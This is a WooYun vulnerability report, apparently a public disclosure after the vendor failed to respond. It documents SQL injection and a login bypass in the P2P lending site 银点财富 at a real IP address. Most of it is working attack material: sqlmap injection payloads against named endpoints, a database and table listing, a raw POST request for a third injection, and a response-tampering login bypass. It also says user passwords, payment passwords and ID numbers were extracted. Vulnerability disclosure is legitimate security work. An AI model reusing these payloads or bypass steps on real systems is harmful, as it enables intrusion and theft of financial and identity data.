当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0186904

漏洞标题:p2p金融安全之银点财富漏洞打包(影响数万成员信息安全含身份证\支付密码等)

相关厂商:银点财富

漏洞作者: 路人甲

提交时间:2016-03-21 12:32

修复时间:2016-05-05 12:32

公开时间:2016-05-05 12:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-03-21: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-05: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

漏洞这么多也不怕数据被盗

详细说明:

http://180.97.80.205/


首页.png


#1注入点1,id参数

http://180.97.80.205/appaction/bao_detail.php?id=51&time=0.9278282364830375


sqlmap跑的时候去掉提么参数,否则会报错

Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=51 AND 5254=5254
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id=51 AND (SELECT * FROM (SELECT(SLEEP(5)))qvnE)
Type: UNION query
Title: Generic UNION query (NULL) - 15 columns
Payload: id=-8819 UNION ALL SELECT NULL,CONCAT(0x7178717871,0x68486753634d4558417247794c514e56784d5456716e53596450564441425746676f72724b4c5a69,0x717a6a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
web application technology: PHP 5.4.41
back-end DBMS: MySQL 5.0.12
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=51 AND 5254=5254
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id=51 AND (SELECT * FROM (SELECT(SLEEP(5)))qvnE)
Type: UNION query
Title: Generic UNION query (NULL) - 15 columns
Payload: id=-8819 UNION ALL SELECT NULL,CONCAT(0x7178717871,0x68486753634d4558417247794c514e56784d5456716e53596450564441425746676f72724b4c5a69,0x717a6a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
web application technology: PHP 5.4.41
back-end DBMS: MySQL 5.0.12
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=51 AND 5254=5254
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id=51 AND (SELECT * FROM (SELECT(SLEEP(5)))qvnE)
Type: UNION query
Title: Generic UNION query (NULL) - 15 columns
Payload: id=-8819 UNION ALL SELECT NULL,CONCAT(0x7178717871,0x68486753634d4558417247794c514e56784d5456716e53596450564441425746676f72724b4c5a69,0x717a6a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
web application technology: PHP 5.4.41
back-end DBMS: MySQL 5.0.12
available databases [6]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sq_phpcms
[*] sq_shangyu
[*] sq_yindian


主要数据在最后三个库里面

Database: sq_yindian
+-----------------------+---------+
| Table | Entries |
+-----------------------+---------+
| dw_account_log | 29623 |
| dw_user_sendemail_log | 21667 |
| dw_message | 15222 |
| dw_account_recharge | 9664 |
| dw_borrow_collection | 7980 |
| dw_friends | 7723 |
| dw_user_log | 7599 |
| dw_credit_log | 6407 |
| sendlog | 4240 |
| dw_user_amount | 4143 |
| dw_user_cache | 4132 |
| dw_user | 4120 |
| dw_borrow_tender_log | 3896 |
| dw_area | 3579 |
| dw_borrow_tender | 3460 |
| dw_prize_order | 2584 |
| dw_account_cash | 1514 |
| dw_credit | 1424 |
| dw_account | 947 |
| dw_userinfo | 813 |
| dw_article | 778 |
| dw_account_bank | 752 |
| dw_article_fields | 717 |
| dw_linkage | 521 |
| dw_user_amountlog | 485 |
| dw_borrow_repayment | 420 |
| dw_cache | 414 |
| dw_cityinfo | 380 |
| dw_userlog_recharge | 376 |
| dw_upfiles | 368 |
| dw_everyday | 285 |
| dw_user_backup | 253 |
| dw_borrow | 228 |
| dw_daizi | 162 |
| dw_user_trend | 136 |
| dw_user_amountapply | 106 |
| dw_system | 88 |
| dw_site | 86 |
| dw_linkage_type | 42 |
| dw_attestation_type | 40 |
| dw_remind | 28 |
| dw_bbs_posts | 26 |
| dw_attestation | 24 |
| dw_module | 23 |
| dw_gongan_jk | 18 |
| dw_links | 16 |
| dw_user_type | 16 |
| dw_bbs_topics | 14 |
| dw_credit_type | 14 |
| dw_scrollpic | 12 |
| dw_bbs_forums | 10 |
| dw_borrow_auto | 9 |
| dw_bbs_credits | 8 |
| dw_credit_rank | 6 |
| dw_invite_type | 5 |
| dw_online | 5 |
| dw_prize | 5 |
| dw_liuyan_set | 4 |
| dw_report_users | 4 |
| dw_flag | 3 |
| dw_friends_request | 3 |
| dw_remind_type | 3 |
| dw_report_roles | 3 |
| dw_scrollpic_type | 3 |
| dw_links_type | 2 |
| dw_log | 2 |
| dw_payment | 2 |
| dw_ad | 1 |
| dw_bbs_settings | 1 |
| dw_borrow_editlog | 1 |
| dw_editor | 1 |
| dw_fields | 1 |
+-----------------------+---------+


只做演示,跑出了三条数据,有登录密码,支付密码,身份证号,邮箱等信息


数据1.png


涉及支付密码

支付密码.png


用户.png


#2另一处SQL注入是手机端摇一摇界面,基于时间的注入

http://180.97.80.205/appaction/yaoyiyao.php?uid=1


SQl2.png


#第三处SQL注入

POST http://180.97.80.205/appaction/phone_action.php HTTP/1.1
Host: 180.97.80.205
Connection: keep-alive
Content-Length: 15
Accept: */*
Origin: file://
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L720T Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,en-US;q=0.8
data=null%5D%5B*


SQl3.png

漏洞证明:

#3逻辑漏洞
手机端登陆界面,简单的不能再简陋了,验证码没有,明文传输,这个如果爆破的话相信只是时间的问题
登陆的时候抓返包,修改返回包为1

逻辑.png


1.png


数百个推荐记录

2.png


3.png


修复方案:

从服务器端验证登录状态
网站多个参数存在注入,建议找专人好好排查一下

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)